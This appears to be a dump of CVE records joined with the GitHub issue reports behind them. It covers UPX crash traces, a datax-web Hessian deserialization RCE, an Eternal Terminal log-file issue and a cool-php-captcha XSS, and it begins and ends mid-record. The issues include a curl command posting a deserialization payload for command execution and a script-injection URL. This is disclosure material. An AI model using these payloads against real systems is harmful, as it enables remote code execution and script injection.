#5 0x61cf89 in do_files(int, int, char**) /home/chen/upx/src/work.cpp:271 #6 0x45fe9f in upx_main(int, char**) /home/chen/upx/src/main.cpp:1266 #7 0x407223 in main /home/chen/upx/src/main.cpp:1324 #8 0x7ffff621f83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/chen/upx/src/bele.h:66 set_ne32 Shadow bytes around the buggy address: 0x0c047fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff9dc0: fa fa[05]fa fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9dd0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9de0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9df0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fa 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==11363==ABORTING ``` gdb ``` (gdb) BT #0 0x00007ffff71a1438 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff71a303a in __GI_abort () at abort.c:89 #2 0x00007ffff7ae484d in __gnu_cxx::__verbose_terminate_handler() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #3 0x00007ffff7ae26b6 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #4 0x00007ffff7ae16a9 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #5 0x00007ffff7ae2005 in __gxx_personality_v0 () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #6 0x00007ffff7545f83 in ?? () from /lib/x86_64-linux-gnu/libgcc_s.so.1 #7 0x00007ffff75462eb in _Unwind_RaiseException () from /lib/x86_64-linux-gnu/libgcc_s.so.1 #8 0x00007ffff7ae290c in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #9 0x000000000041574a in throwInternalError(char const*) () #10 0x00000000004b279d in MemBuffer::checkState() const () #11 0x00000000004b2a0f in MemBuffer::dealloc() () #12 0x000000000045f431 in PackTmt::pack(OutputFile*) () #13 0x000000000047d8c4 in Packer::doPack(OutputFile*) () #14 0x00000000004d0245 in do_one_file(char const*, char*) () #15 0x00000000004d048f in do_files(int, int, char**) () #16 0x0000000000422747 in upx_main(int, char**) () #17 0x0000000000405602 in main () ``` ## What should have happened? <!--- If you're describing a bug, tell us what should happen --> <!--- If you're suggesting a change/improvement, tell us how it should work --> No failed assertions. ## Do you have an idea for a solution? <!--- Not obligatory, but suggest a fix/reason for the bug, --> <!--- or ideas how to implement the addition or change --> ## How can we reproduce the issue? <!--- Provide unambiguous set of steps to reproduce this bug. Include code to reproduce, if relevant --> 1. Build UPX 4.0.1 (the latest version) 2. Run `./upx ./POC1` zipped poc: [POC1.zip](https://github.com/upx/upx/files/10081325/POC1.zip) ``` Ultimate Packer for eXecutables Copyright (C) 1996 - 2022 UPX git-fdec47+ Markus Oberhumer, Laszlo Molnar & John Reiser Nov 16th 2022 File size Ratio Format Name -------------------- ------ ----------- ----------- terminate called after throwing an instance of 'InternalError' what(): std::exception Aborted ``` ## Please tell us details about your environment. <!--- Include as many relevant details about the environment you experienced the bug in --> * UPX version used (`upx --version`): ``` ./upx --version upx v4.0.1-dirty UCL data compression library 1.03 zlib data compression library 1.2.13 LZMA SDK version 4.43 doctest C++ testing framework version 2.4.9 Copyright (C) 1996-2022 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2022 Laszlo Molnar Copyright (C) 2000-2022 John F. Reiser Copyright (C) 2002-2022 Jens Medoch Copyright (C) 1995-2022 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov Copyright (C) 2016-2021 Viktor Kirilov UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx -L'. ``` * Host Operating System and version: Ubuntu 16.04 LTS * Host CPU architecture: 11th Gen Intel® Core™ i5-11500 @ 2.70GHz × 8 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
heap-buffer-overflow in PackTmt::pack
https://api.github.com/repos/upx/upx/issues/632/comments
1
2022-11-24T06:26:03Z
2022-11-27T23:14:58Z
https://github.com/upx/upx/issues/632
1,462,826,378
632
4,612
CVE-2023-23457
2023-01-12T19:15:24.810
A Segmentation fault was found in UPX in PackLinuxElf64::invert_pt_dynamic() in p_lx_elf.cpp. An attacker with a crafted input file allows invalid memory address access that could lead to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.4, "source": "patrick@puiterwijk.org", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2160382" }, { "source": "patrick@puiterwijk.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/779b648c5f6aa9b33f4728f79dd4d0efec0bf860" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/631" }, { "source": "patrick@puiterwijk.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EL3BVKIGG3SH6I3KPOYQAWCBD4UMPOPI/" }, { "source": "patrick@puiterwijk.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TGEP3FBNRZXGLIA2B2ICMB32JVMPREFZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2160382" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/779b648c5f6aa9b33f4728f79dd4d0efec0bf860" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/631" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EL3BVKIGG3SH6I3KPOYQAWCBD4UMPOPI/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TGEP3FBNRZXGLIA2B2ICMB32JVMPREFZ/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "191334EB-C1FD-4A4C-A48A-139452FD5DF4", "versionEndExcluding": "2022-11-23", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/upx/upx/issues/631
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
This issue tracker is **ONLY** used for reporting bugs. Please use [stackoverflow](https://stackoverflow.com) for supporting issues. <!--- IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE. Just read it and fill in the details we're asking, it saves so much of our time. Thanks! --> ## What's the problem (or question)? <!--- If describing a bug, tell us what happens instead of the expected behavior --> <!--- If suggesting a change/improvement, explain the difference from current behavior --> UPX4.0.1 shows "Bus Error". SEGV on /home/chen/upx/src/p_lx_elf.cpp:5783 PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*, unsigned long long) ASAN ``` Ultimate Packer for eXecutables Copyright (C) 1996 - 2022 UPX git-fdec47+ Markus Oberhumer, Laszlo Molnar & John Reiser Nov 16th 2022 File size Ratio Format Name -------------------- ------ ----------- ----------- ASAN:SIGSEGV ================================================================= ==33120==ERROR: AddressSanitizer: SEGV on unknown address 0x1000b7ff78d0 (pc 0x000000484c1d bp 0x7fffffffc9f0 sp 0x7fffffffc610 T0) #0 0x484c1c in PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*, unsigned long long) /home/chen/upx/src/p_lx_elf.cpp:5783 #1 0x495c66 in PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*, unsigned long long) /home/chen/upx/src/p_lx_elf.cpp:825 #2 0x495c66 in PackLinuxElf64::PackLinuxElf64help1(InputFile*) /home/chen/upx/src/p_lx_elf.cpp:826 #3 0x496c6a in PackLinuxElf64Le::PackLinuxElf64Le(InputFile*) /home/chen/upx/src/p_lx_elf.h:430 #4 0x496c6a in PackLinuxElf64amd::PackLinuxElf64amd(InputFile*) /home/chen/upx/src/p_lx_elf.cpp:1042 #5 0x5757a0 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/chen/upx/src/packmast.cpp:194 #6 0x577311 in PackMaster::getPacker(InputFile*) /home/chen/upx/src/packmast.cpp:238 #7 0x57744f in PackMaster::pack(OutputFile*) /home/chen/upx/src/packmast.cpp:258 #8 0x61ca72 in do_one_file(char const*, char*) /home/chen/upx/src/work.cpp:157 #9 0x61cf89 in do_files(int, int, char**) /home/chen/upx/src/work.cpp:271 #10 0x45fe9f in upx_main(int, char**) /home/chen/upx/src/main.cpp:1266 #11 0x407223 in main /home/chen/upx/src/main.cpp:1324 #12 0x7ffff621f83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #13 0x409ef8 in _start (/home/chen/ifcut/upx/upx-asan+0x409ef8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/chen/upx/src/p_lx_elf.cpp:5783 PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*, unsigned long long) ==33120==ABORTING ``` gdb ``` (gdb) bt #0 0x0000000000484c1d in PackLinuxElf64::invert_pt_dynamic ( this=this@entry=0x61b00001f180, dynp=<optimized out>, headway=<optimized out>) at /home/chen/upx/src/p_lx_elf.cpp:5783 #1 0x0000000000495c67 in PackLinuxElf64::invert_pt_dynamic (headway=<optimized out>, dynp=<optimized out>, this=0x61b00001f180) at /home/chen/upx/src/p_lx_elf.cpp:825 #2 PackLinuxElf64::PackLinuxElf64help1 (this=this@entry=0x61b00001f180, f=f@entry=0x7fffffffcc70) at /home/chen/upx/src/p_lx_elf.cpp:826 #3 0x0000000000496c6b in PackLinuxElf64Le::PackLinuxElf64Le (f=0x7fffffffcc70, this=0x61b00001f180) at /home/chen/upx/src/p_lx_elf.h:430 #4 PackLinuxElf64amd::PackLinuxElf64amd (this=0x61b00001f180, f=0x7fffffffcc70) at /home/chen/upx/src/p_lx_elf.cpp:1042 #5 0x00000000005757a1 in PackMaster::visitAllPackers ( func=0x577870 <try_pack(Packer*, void*)>, f=0x7fffffffcc70, o=0x7fffffffce88, user=0x7fffffffcc70) at /home/chen/upx/src/packmast.cpp:194 #6 0x0000000000577312 in PackMaster::getPacker (f=<optimized out>) at /home/chen/upx/src/packmast.cpp:238 #7 0x0000000000577450 in PackMaster::pack (this=this@entry=0x7fffffffce70, fo=fo@entry=0x7fffffffcd70) at /home/chen/upx/src/packmast.cpp:258 #8 0x000000000061ca73 in do_one_file (iname=iname@entry=0x7fffffffdede "./POC2", oname=oname@entry=0x7fffffffd4c0 "./POC2.000") at /home/chen/upx/src/work.cpp:157 #9 0x000000000061cf8a in do_files (i=i@entry=1, argc=argc@entry=2, argv=argv@entry=0x7fffffffda98) at /home/chen/upx/src/work.cpp:271 #10 0x000000000045fea0 in upx_main (argc=<optimized out>, argv=<optimized out>) at /home/chen/upx/src/main.cpp:1266 #11 0x0000000000407224 in main (argc=2, argv=0x7fffffffda98) at /home/chen/upx/src/main.cpp:1324 ``` ## What should have happened? <!--- If you're describing a bug, tell us what should happen --> <!--- If you're suggesting a change/improvement, tell us how it should work --> No Bus error. ## Do you have an idea for a solution? <!--- Not obligatory, but suggest a fix/reason for the bug, --> <!--- or ideas how to implement the addition or change --> ## How can we reproduce the issue? <!--- Provide unambiguous set of steps to reproduce this bug. Include code to reproduce, if relevant --> 1. Build UPX 4.0.1 (the latest version) 2. Run ` ./upx ./POC2` zipped poc: [POC2.zip](https://github.com/upx/upx/files/10080300/POC2.zip) ## Please tell us details about your environment. <!--- Include as many relevant details about the environment you experienced the bug in --> * UPX version used (`upx --version`): ``` ./upx --version upx v4.0.1-dirty UCL data compression library 1.03 zlib data compression library 1.2.13 LZMA SDK version 4.43 doctest C++ testing framework version 2.4.9 Copyright (C) 1996-2022 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2022 Laszlo Molnar Copyright (C) 2000-2022 John F. Reiser Copyright (C) 2002-2022 Jens Medoch Copyright (C) 1995-2022 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov Copyright (C) 2016-2021 Viktor Kirilov UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx -L'. ``` * Host Operating System and version: `Ubuntu 16.04 LTS` * Host CPU architecture: `11th Gen Intel® Core™ i5-11500 @ 2.70GHz × 8` * Target Operating System and version: `same as Host` * Target CPU architecture: `same as Host`
SEGV on PackLinuxElf64::invert_pt_dynamic
https://api.github.com/repos/upx/upx/issues/631/comments
1
2022-11-24T02:21:53Z
2022-11-27T23:16:30Z
https://github.com/upx/upx/issues/631
1,462,658,711
631
4,613
CVE-2022-46478
2023-01-13T01:15:10.090
The RPC interface in datax-web v1.0.0 and v2.0.0 to v2.1.2 contains no permission checks by default which allows attackers to execute arbitrary commands via crafted Hessian serialized data.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/WeiYe-Jing/datax-web/issues/587" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/WeiYe-Jing/datax-web/issues/587" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:datax-web_project:datax-web:*:*:*:*:*:*:*:*", "matchCriteriaId": "487BC313-20BD-4F64-8DE6-AF149564031F", "versionEndExcluding": null, "versionEndIncluding": "2.1.2", "versionStartExcluding": null, "versionStartIncluding": "1.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/WeiYe-Jing/datax-web/issues/587
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "WeiYe-Jing", "datax-web" ]
In `datax-web/datax-core/src/main/java/com/wugui/datatx/core/executor/JobExecutor.java` Use the Hessian protocol directly as a serialization method ![image](https://user-images.githubusercontent.com/13026505/203533294-9b7ece50-f96d-426a-bbc0-c0f25172e59d.png) Because the executor rpc interface has no permission checks by default, the attacker can send the maliciously constructed Hessian serialized data to the rpc interface, leading to command execution. `datax-web/datax-rpc/src/main/java/com/wugui/datax/rpc/serialize/impl/HessianSerializer.java` ![image](https://user-images.githubusercontent.com/13026505/203533661-b7f5601d-bf9b-464a-92fe-70f35e12c47a.png) Poc: 1. Use [ysomap](https://github.com/wh1t3p1g/ysomap) to generate the payload by SpringAbstractBeanFactoryPointcutAdvisor.SpringJndiBullet1. 2. `curl -XPOST --header "Content-Type:application/octet-stream" --data-binary "@payload" http://ip:9999/` This issue affects datax-web 2.7.x version 1.0.0, 2.0.0-2.1.2
[BUG] [CVE-2022-46478] datax-web executor rpc interface has no privilege checks by default, which leads to deserialization
https://api.github.com/repos/WeiYe-Jing/datax-web/issues/587/comments
0
2022-11-23T11:17:34Z
2023-05-04T01:58:26Z
https://github.com/WeiYe-Jing/datax-web/issues/587
1,461,561,089
587
4,614
CVE-2022-48257
2023-01-13T01:15:10.197
In Eternal Terminal 6.2.1, etserver and etclient have predictable logfile names in /tmp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://www.openwall.com/lists/oss-security/2023/02/16/1" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MisterTea/EternalTerminal/issues/555" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/MisterTea/EternalTerminal/pull/556" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2RY6PKBU73I45L6YWNYCUK2XBEXEFX7L/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NYODHZECXYFC2BNODZPZXZAXOKGMCYAP/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U6MO4FSKYNSAJVUXYP7LRY7ARUIGKBFL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://www.openwall.com/lists/oss-security/2023/02/16/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/MisterTea/EternalTerminal/issues/555" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/MisterTea/EternalTerminal/pull/556" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2RY6PKBU73I45L6YWNYCUK2XBEXEFX7L/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NYODHZECXYFC2BNODZPZXZAXOKGMCYAP/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U6MO4FSKYNSAJVUXYP7LRY7ARUIGKBFL/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eternal_terminal_project:eternal_terminal:6.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "2836762E-FEA1-4C3D-BD08-EDDB8C1B4161", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/MisterTea/EternalTerminal/issues/555
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "MisterTea", "EternalTerminal" ]
This is a feature request to allow an ini-config based and/or cxxopts way to change the location of the log files from /tmp to a directory of your choice: - ideally the logfiles should go into a dedicated directory e.g. in /var/log/et for the server side. - for the client side a set of logfiles can be kept in the home directory, but old logs should be deleted after some time. Alternatively client logs can be placed into /run/user/<uid>/et-logs or a similar location. - when using shared world-writable directories like /tmp then at least `O_NOFOLLOW|O_EXCL|O_CREAT` should also be added to open() flags. If open fails then it should be retried with alternative filenames until it succeeds. - the file mode mask should be set in a way that the resulting files only have 0600 permissions i.e. read and write permission for the owner to avoid leaking information to other users on the system.
Add configurable log paths and address log path permission concerns
https://api.github.com/repos/MisterTea/EternalTerminal/issues/555/comments
0
2022-12-16T18:03:03Z
2023-01-18T18:47:20Z
https://github.com/MisterTea/EternalTerminal/issues/555
1,500,646,487
555
4,615
CVE-2009-10001
2023-01-13T18:15:08.750
A vulnerability classified as problematic was found in jianlinwei cool-php-captcha up to 0.2. This vulnerability affects unknown code of the file example-form.php. The manipulation of the argument captcha with the input %3Cscript%3Ealert(1)%3C/script%3E leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.3 is able to address this issue. The name of the patch is c84fb6b153bebaf228feee0cbf50728d27ae3f80. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218296.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jianlinwei/cool-php-captcha/commit/c84fb6b153bebaf228feee0cbf50728d27ae3f80" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jianlinwei/cool-php-captcha/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/jianlinwei/cool-php-captcha/releases/tag/0.3" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.218296" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://vuldb.com/?id.218296" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jianlinwei/cool-php-captcha/commit/c84fb6b153bebaf228feee0cbf50728d27ae3f80" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jianlinwei/cool-php-captcha/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/jianlinwei/cool-php-captcha/releases/tag/0.3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.218296" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://vuldb.com/?id.218296" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cool-php-captcha_project:cool-php-captcha:*:*:*:*:*:*:*:*", "matchCriteriaId": "1072A6AD-DE27-46E3-B756-9577DCC644E3", "versionEndExcluding": "0.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jianlinwei/cool-php-captcha/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jianlinwei", "cool-php-captcha" ]
``` What steps will reproduce the problem? 1. http://127.0.0.1/example-form.php?captcha=%3Cscript%3Ealert(1)%3C/script%3E What is the expected output? What do you see instead? filtered with htmlspcialchars() What version of the product are you using? On what operating system? 0.2.1 Please provide any additional information below. textbook xss. Overall I think your captcha is quite secure and easy to implement. I like the text manipluation and the random fonts. I recommend using randomly generated answers over a list of words because possible guesses can be compared to the list before making a real guess. I am the Michael Brooks in this article: http://www.forbes.com/2008/11/25/cyber-security-bots-tech-identity08-cx_ag_1125c yberbots.html peace ``` Original issue reported on code.google.com by `firealwa...@gmail.com` on 31 Dec 2008 at 2:02
xss
https://api.github.com/repos/jianlinwei/cool-php-captcha/issues/2/comments
1
2015-03-14T04:15:22Z
2015-03-14T04:15:22Z
https://github.com/jianlinwei/cool-php-captcha/issues/2
61,400,276
2
4,616
CVE-2022-48090
2023-01-13T19:15:11.193
Tramyardg hotel-mgmt-system version 2022.4 is vulnerable to SQL Injection via /app/dao/CustomerDAO.php.
